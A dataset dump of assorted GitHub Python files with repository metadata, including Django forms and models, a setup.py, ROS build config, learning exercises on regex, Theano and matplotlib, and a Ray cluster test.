get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations/{frontendIPConfigurationName}'} # type: ignore
| [
"[email protected]"
] | |
e5f98ccd8f816d3621fa6a5b9fd0132e0965826b | 30a89ae47ca79e4ced151908f4059cd77ade30ef | /order/forms.py | 0c700dce796932a329f19a1102f5113624a6fcd8 | [] | no_license | harshit8858/mindful_project1_salesapp | 0bd80c40b2349fe08744dcd0625283c5b6ba4029 | 66f7c7af868518898aa6422d1b17ca9f7cf433ef | refs/heads/master | 2020-03-24T00:02:49.972583 | 2018-08-18T07:56:49 | 2018-08-18T07:56:49 | 142,269,897 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | from django import forms
from .models import *
class OrderForm(forms.ModelForm):
class Meta:
model = Order
fields = [
'customer',
'remark',
'product',
'quantity',
'price',
'discount',
'tax',
'total',
]
| [
"[email protected]"
] | |
8f4e42b65ce09e4a562f2d4b298babce0fd4be3b | 2417d9f6afe95ba19354c65bfb400556f2eb2e19 | /setup.py | 2a91c65f19fbb3863f4728098116fca13710074a | [
"Apache-2.0"
] | permissive | rakeshnb/pixiedust | 39f1249a867719919441488f085e1f60519dae58 | fb5198c7564589c267147d7bdee1f798e7b361ef | refs/heads/master | 2020-05-23T08:09:42.603871 | 2016-10-07T22:08:10 | 2016-10-07T22:08:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 732 | py | from setuptools import setup
setup(name='pixiedust',
version='0.38',
description='Misc helpers for Spark Python Notebook',
url='https://github.com/ibm-cds-labs/pixiedust',
install_requires=['maven-artifact','mpld3'],
author='David Taieb',
author_email='[email protected]',
license='Apache 2.0',
packages=['pixiedust','pixiedust.packageManager','pixiedust.display',
'pixiedust.display.table','pixiedust.display.graph','pixiedust.display.chart','pixiedust.display.chart.plugins',
'pixiedust.display.tests','pixiedust.display.download',
'pixiedust.services',
'pixiedust.utils'],
include_package_data=True,
zip_safe=False) | [
"[email protected]"
] | |
9e970d6b5a4196876c2d30a1e3a820a778e6aabc | 4fe0d37eb4810d3aa5fca50a60bd8f57c2558673 | /build/ros_arduino_bridge/ros_arduino_python/catkin_generated/pkg.develspace.context.pc.py | cfcd6131b4b1dad06511bc5b36495eba4e78533a | [] | no_license | jim1949/gpsbot_ws | f0aa961472d65633f1d385426e6e0fd489a8e104 | 0dfa36223620ae226f6a40735179b6cae265693d | refs/heads/master | 2021-05-07T05:55:08.584882 | 2017-11-22T08:45:06 | 2017-11-22T08:45:06 | 103,118,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "ros_arduino_python"
PROJECT_SPACE_DIR = "/home/relaybot/gpsbot_ws/devel"
PROJECT_VERSION = "0.2.0"
| [
"[email protected]"
] | |
aea5124f9f2718dae828e8f08e419c0c88fa27e0 | 1d60c5a7b8ce6277bff514e376f79848f706344c | /Data Analyst with Python - Career Track/01. Introduction to Data Science in Python/04. Different Types of Plots/05. Modifying histograms.py | 1ce32da1b97d613df25adfdb3b264ed5dbd7b8c8 | [] | no_license | DidiMilikina/DataCamp | 338c6e6d3b4f5b6c541c1aba155a36e9ee24949d | 3bf2cf3c1430190a7f8e54efda7d50a5fd66f244 | refs/heads/master | 2020-12-15T13:16:54.178967 | 2020-05-06T17:30:54 | 2020-05-06T17:30:54 | 235,113,616 | 4 | 3 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | '''
Modifying histograms
Let's explore how changes to keyword parameters in a histogram can change the output. Recall that:
range sets the minimum and maximum datapoints that we will include in our histogram.
bins sets the number of points in our histogram.
We'll be exploring the weights of various puppies from the DataFrame puppies. matplotlib has been loaded under the alias plt.
Instructions 1/3
35 XP
Create a histogram of the column weight from the DataFrame puppies.
Change the number of bins to 50.
Change the range to start at 5 and end at 35.
'''
SOLUTION
# Change the range to start at 5 and end at 35
plt.hist(puppies.weight,
range=(5, 35))
# Add labels
plt.xlabel('Puppy Weight (lbs)')
plt.ylabel('Number of Puppies')
# Display
plt.show() | [
"[email protected]"
] | |
5e95d15bbcb402658a0aa5ca152150228122ffa4 | 88be3911c7e73d4bf71b0482ee6d15f49030463a | /SEC31_Regex/Demo_findall.py | efd4979649d52b8aed3afc6af63204120a6ce980 | [] | no_license | skyaiolos/Python_KE | 85f879d1cb637debd2e3a0239d7c8d7bfb30c827 | 8cc42c8f4d1245de4b79af429f72a9ed2508bc1a | refs/heads/master | 2021-01-22T08:47:47.761982 | 2017-05-28T14:57:02 | 2017-05-28T14:57:02 | 92,634,507 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | """
# Script Description:
Python 正则表达式之RegexObject
"""
__author__ = "爱的彼岸(QQ:3124724)"
__copyright__ = "Copyright 2017,[email protected]"
# Create by Jianguo on 2017/5/7
import re
text = "Tom is 8 years old, Mike is 25 years old."
# 模式对象, 表现编译后的正则表达式(编译为字节码并缓存)
# re.compile(r'模式')
print('findall()'.center(100, '*'))
pattern = re.compile(r'\d+')
print(pattern.findall(text))
print(re.findall(r'\d+', text))
s = "\\author:Tom"
pattern = re.compile(r'\\author')
rex = pattern.findall(s)
print(rex)
text = "Tom is 8 years old, Mike is 25 years old.Peter is 87 years old."
pattern = re.compile(r'\d+')
rex = pattern.findall(text)
print(rex)
p_name = re.compile(r'[A-Z]\w+')
rex_p = p_name.findall(text)
print(rex_p)
p1 = re.compile(r'\d+')
p2 = re.compile(r'[A-Z]\w+')
print('findall() VS finditer()'.center(100, '*'))
print(p1.findall(text))
print()
print('finditer()'.center(30, '*'))
it = p1.finditer(text)
for item in it:
print(item)
| [
"[email protected]"
] | |
21a700bb20d695f0545a44e8ea56ccd2d5c1ecbd | d82ac08e029a340da546e6cfaf795519aca37177 | /chapter_13_parallel_nn_training_theano/02_array_structures.py | 041b18247a74fa59fe0cfc17db87096150e8cf80 | [] | no_license | CSwithJC/PythonMachineLearning | 4409303c3f4d4177dc509c83e240d7a589b144a0 | 0c4508861e182a8eeacd4645fb93b51b698ece0f | refs/heads/master | 2021-09-04T04:28:14.608662 | 2018-01-15T20:25:36 | 2018-01-15T20:25:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | import theano
import numpy as np
from theano import tensor as T
# Config Theano to use 32-bit architecture:
theano.config.floatX = 'float32'
#theano.config.device = 'gpu'
# initialize
x = T.fmatrix(name='x')
x_sum = T.sum(x, axis=0)
# compile
calc_sum = theano.function(inputs=[x], outputs=x_sum)
# execute (Python List)
ary = [[1, 2, 3], [1, 2, 3]]
print('Column sum:', calc_sum(ary))
# execute (NumPy array)
ary = np.array([[1, 2, 3], [1, 2, 3]],
dtype=theano.config.floatX)
print('Column sum:', calc_sum(ary))
print('TensorType: ', x.type())
| [
"[email protected]"
] | |
bd82d3e98d1a67cc87a28e599370a8b6475b91ae | 3467fe90c6c49b4ac86785d1da19d7183b2ac0f5 | /6002x/findCombination.py | 85d683714d531ae692f4b2fa142f7782b706f04d | [
"MIT"
] | permissive | CarlosEduardoAS/MITx | 277da453638da672c9946513bfb7a86e7446072b | 532695d69c77581b6df80c145283b349b75e4973 | refs/heads/main | 2023-05-02T13:50:15.283211 | 2021-05-25T20:02:48 | 2021-05-25T20:02:48 | 351,555,645 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,219 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 25 16:10:53 2021
@author: caear
"""
import numpy
import itertools
def find_combination(choices, total):
"""
choices: a non-empty list of ints
total: a positive int
Returns result, a numpy.array of length len(choices)
such that
* each element of result is 0 or 1
* sum(result*choices) == total
* sum(result) is as small as possible
In case of ties, returns any result that works.
If there is no result that gives the exact total,
pick the one that gives sum(result*choices) closest
to total without going over.
"""
power_set = []
for i in itertools.product([1,0], repeat = len(choices)):
power_set.append(numpy.array(i))
filter_set_eq = []
filter_set_less = []
for j in power_set:
if sum(j*choices) == total:
filter_set_eq.append(j)
elif sum(j*choices) < total:
filter_set_less.append(j)
if len(filter_set_eq) > 0:
minidx = min(enumerate(filter_set_eq), key=lambda x:sum(x[1]))[1]
return minidx
else:
minidx = max(enumerate(filter_set_less), key = lambda x:sum(x[1]))[1]
return minidx
| [
"[email protected]"
] | |
ea385301144e17aa355e09063a6bd7bb66103bb1 | d7faf47825b6f8e5abf9a9587f1e7248c0eed1e2 | /python/ray/tests/test_asyncio_cluster.py | bea440bdf4b27bb1b625ec135c2bbc2bd5dd6d5b | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | ggdupont/ray | 7d7c7f39a8f99a09199fab60897da9e48b8e2645 | 15391026c19f1cbbb8d412e46b01f7998e42f2b9 | refs/heads/master | 2023-03-12T06:30:11.428319 | 2021-12-07T05:34:27 | 2021-12-07T05:34:27 | 165,058,028 | 0 | 0 | Apache-2.0 | 2023-03-04T08:56:50 | 2019-01-10T12:41:09 | Python | UTF-8 | Python | false | false | 815 | py | # coding: utf-8
import asyncio
import sys
import pytest
import numpy as np
import ray
from ray.cluster_utils import Cluster, cluster_not_supported
@pytest.mark.xfail(cluster_not_supported, reason="cluster not supported")
@pytest.mark.asyncio
async def test_asyncio_cluster_wait():
cluster = Cluster()
head_node = cluster.add_node()
cluster.add_node(resources={"OTHER_NODE": 100})
ray.init(address=head_node.address)
@ray.remote(num_cpus=0, resources={"OTHER_NODE": 1})
def get_array():
return np.random.random((192, 1080, 3)).astype(np.uint8) # ~ 0.5MB
object_ref = get_array.remote()
await asyncio.wait_for(object_ref, timeout=10)
ray.shutdown()
cluster.shutdown()
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
| [
"[email protected]"
] | |
adf942ef17cc289e1c3cf16a609ecac205d03692 | fc314838b18c14a00310f0059d5358c7c4afabd6 | /special/models.py | 6796cb77ef4370af265ada4e6ba8966f501a7cd4 | [
"MIT"
] | permissive | opendream/asip | 5cb4b997fab2438193ae7490c159efced6dc3d91 | 20583aca6393102d425401d55ea32ac6b78be048 | refs/heads/master | 2022-11-28T23:28:18.405604 | 2020-03-10T04:56:23 | 2020-03-10T04:56:23 | 190,504,979 | 1 | 1 | MIT | 2022-11-22T01:10:46 | 2019-06-06T03:06:03 | HTML | UTF-8 | Python | false | false | 1,126 | py | from django.db import models
# Create your models here.
from common.constants import STATUS_PUBLISHED, STATUS_CHOICES
from common.models import AbstractPermalink, CommonTrashModel
import files_widget
class Special(CommonTrashModel, AbstractPermalink):
title = models.CharField(max_length=512)
image = files_widget.ImageField(verbose_name='Banner Image', null=True, blank=True)
status = models.IntegerField(choices=STATUS_CHOICES, default=STATUS_PUBLISHED)
created = models.DateTimeField(auto_now_add=True, null=True, blank=True)
changed = models.DateTimeField(auto_now=True, null=True, blank=True)
def __unicode__(self):
return self.permalink
def get_absolute_url(self):
return '/%s/' % self.permalink
class Page(CommonTrashModel, AbstractPermalink):
special = models.ForeignKey(Special, related_name='pages', null=True, blank=True)
status = models.IntegerField(choices=STATUS_CHOICES, default=STATUS_PUBLISHED)
created = models.DateTimeField(auto_now_add=True, null=True, blank=True)
changed = models.DateTimeField(auto_now=True, null=True, blank=True)
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.